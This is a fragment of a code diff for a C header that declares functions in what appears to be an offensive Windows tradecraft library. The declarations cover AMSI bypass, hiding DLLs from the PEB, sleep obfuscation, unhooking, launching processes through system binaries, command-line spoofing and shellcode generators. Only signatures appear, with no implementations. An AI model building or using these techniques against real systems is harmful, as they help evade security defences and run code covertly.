|
||||
BOOL RemoveDllFromPebA(_In_ LPCSTR lpModuleName);
|
||||
BOOL RemoveDllFromPebW(_In_ LPCWSTR lpModuleName);
|
||||
BOOL HookEngineUnhookHeapFree(_In_ BOOL StartEngine);
|
||||
BOOL HookEngineRestoreHeapFree(_In_ BOOL ShutdownEngine);
|
||||
BOOL SleepObfuscationViaVirtualProtect(_In_ DWORD dwSleepTimeInMilliseconds, _In_ PUCHAR Key);
|
||||
BOOL RemoveRegisterDllNotification(VOID);
|
||||
BOOL AmsiBypassViaPatternScan(DWORD ProcessId);
|
||||
BOOL CopyFileViaSetupCopyFileW(LPCWSTR Source, LPCWSTR Destination);
|
||||
BOOL CopyFileViaSetupCopyFileA(LPCSTR Source, LPCSTR Destination);
|
||||
BOOL CreateProcessWithCfGuardW(_Inout_ PPROCESS_INFORMATION Pi, _In_ PWCHAR Path);
|
||||
BOOL CreateProcessWithCfGuardA(_Inout_ PPROCESS_INFORMATION Pi, _In_ PCHAR Path);
|
||||
HRESULT CreateProcessFromIHxInteractiveUserW(_In_ PWCHAR UriFile);
|
||||
HRESULT CreateProcessFromIHxInteractiveUserA(_In_ PCHAR UriFile);
|
||||
HRESULT CreateProcessFromIHxHelpPaneServerW(_In_ PWCHAR UriFile);
|
||||
HRESULT CreateProcessFromIHxHelpPaneServerA(_In_ PCHAR UriFile);
|
||||
DWORD CreateProcessFromShellExecuteInExplorerProcessW(_In_ PWCHAR BinaryPath);
|
||||
DWORD CreateProcessFromShellExecuteInExplorerProcessA(_In_ PCHAR BinaryPath);
|
||||
DWORD CreateProcessFromIShellDispatchInvokeW(_In_ PWCHAR BinaryPath);
|
||||
DWORD CreateProcessFromIShellDispatchInvokeA(_In_ PCHAR BinaryPath);
|
||||
DWORD CreateProcessViaNtCreateUserProcessW(PWCHAR FullBinaryPath);
|
||||
DWORD CreateProcessViaNtCreateUserProcessA(PCHAR FullBinaryPath);
|
||||
DWORD CreateProcessByWindowsRHotKeyW(_In_ PWCHAR FullPathToBinary);
|
||||
DWORD CreateProcessByWindowsRHotKeyA(_In_ PCHAR FullPathToBinary);
|
||||
DWORD CreateProcessByWindowsRHotKeyExW(_In_ PWCHAR FullPathToBinary);
|
||||
DWORD CreateProcessByWindowsRHotKeyExA(_In_ PCHAR FullPathToBinary);
|
||||
BOOL AmsiBypassViaPatternScan(DWORD ProcessId);
|
||||
BOOL CopyFileViaSetupCopyFileW(LPCWSTR Source, LPCWSTR Destination);
|
||||
BOOL CopyFileViaSetupCopyFileA(LPCSTR Source, LPCSTR Destination);
|
||||
BOOL CreateProcessFromINFSectionInstallStringNoCabW(LPCWSTR PathToInfFile, LPCWSTR NameOfSection);
|
||||
BOOL CreateProcessFromINFSectionInstallStringNoCabA(LPCSTR PathToInfFile, LPCSTR NameOfSection);
|
||||
BOOL CreateProcessFromINFSetupCommandW(LPCWSTR PathToInfFile, LPCWSTR NameOfSection);
|
||||
|
@ -369,12 +367,18 @@ BOOL CreateProcessFromINFSectionInstallStringNoCab2A(LPCSTR PathToInfFile, LPCST
|
|||
BOOL CreateProcessFromINFSectionInstallStringNoCab2W(LPCWSTR PathToInfFile, LPCWSTR NameOfSection);
|
||||
BOOL CreateProcessFromIeFrameOpenUrlW(LPCWSTR PathToUrlFile);
|
||||
BOOL CreateProcessFromIeFrameOpenUrlA(LPCSTR PathToUrlFile);
|
||||
BOOL CreateProcessFromINFSectionInstallStringNoCab3W(LPCWSTR PathToInfFile, LPCWSTR NameOfSection); // <--- not implemented
|
||||
BOOL CreateProcessFromINFSectionInstallStringNoCab3A(LPCSTR PathToInfFile, LPCSTR NameOfSection); // <--- not implemented
|
||||
BOOL CreateProcessFromShdocVwOpenUrlW(LPCWSTR PathToUrlFile);
|
||||
BOOL CreateProcessFromShdocVwOpenUrlA(LPCSTR PathToUrlFile);
|
||||
BOOL CreateProcessFromShell32ShellExecRunDllW(LPCWSTR PathToFile);
|
||||
BOOL CreateProcessFromShell32ShellExecRunDllA(LPCSTR PathToFile);
|
||||
BOOL CreateProcessFromShell32ShellExecRunW(LPCWSTR PathToFile);
|
||||
BOOL CreateProcessFromShell32ShellExecRunA(LPCSTR PathToFile);
|
||||
BOOL CreateProcessFromUrlOpenUrlW(LPCWSTR PathToUrlFile);
|
||||
BOOL CreateProcessFromUrlOpenUrlA(LPCSTR PathToUrlFile);
|
||||
BOOL CreateProcessFromUrlFileProtocolHandlerW(LPCWSTR PathToUrlFile);
|
||||
BOOL CreateProcessFromUrlFileProtocolHandlerA(LPCSTR PathToUrlFile);
|
||||
BOOL CreateProcessFromZipfldrRouteCallW(LPCWSTR PathToFile);
|
||||
BOOL CreateProcessFromZipfldrRouteCallA(LPCSTR PathToFile);
|
||||
BOOL CreateProcessFromMsHTMLW(LPCWSTR MshtaCommand);
|
||||
|
||||
|
||||
|
||||
|
||||
|
@ -435,3 +439,16 @@ INT __demonstration_WinMain(VOID); //hook sleep
|
|||
PCHAR GenericShellcodeHelloWorldMessageBoxA(_Out_ PDWORD SizeOfShellcodeInBytes);
|
||||
PCHAR GenericShellcodeOpenCalcExitThread(_Out_ PDWORD SizeOfShellcodeInBytes);
|
||||
PCHAR GenericShellcodeHelloWorldMessageBoxAEbFbLoop(_Out_ PDWORD SizeOfShellcodeInBytes);
|
||||
|
||||
|
||||
BOOL DeleteDirectoryAndSubDataViaDelNodeW(LPCWSTR FullPathToDirectory);
|
||||
BOOL DeleteDirectoryAndSubDataViaDelNodeA(LPCSTR FullPathToDirectory);
|
||||
BOOL IsProcessRunningAsAdmin2(VOID);
|
||||
BOOL ExtractFilesFromCabIntoTargetW(LPCWSTR CabFile, LPCWSTR OutputDirectory);
|
||||
BOOL ExtractFilesFromCabIntoTargetA(LPCSTR CabFile, LPCSTR OutputDirectory);
|
||||
|
||||
HANDLE IeCreateFileW(LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
|
||||
HANDLE IeCreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
|
||||
|
||||
BOOL RtlSetBaseUnicodeCommandLine(PWCHAR CommandLinePayload);
|
||||
DWORD CreateProcessFromWmiWin32_ProcessW(LPCWSTR BinaryPath);
|
Loading…
Reference in New Issue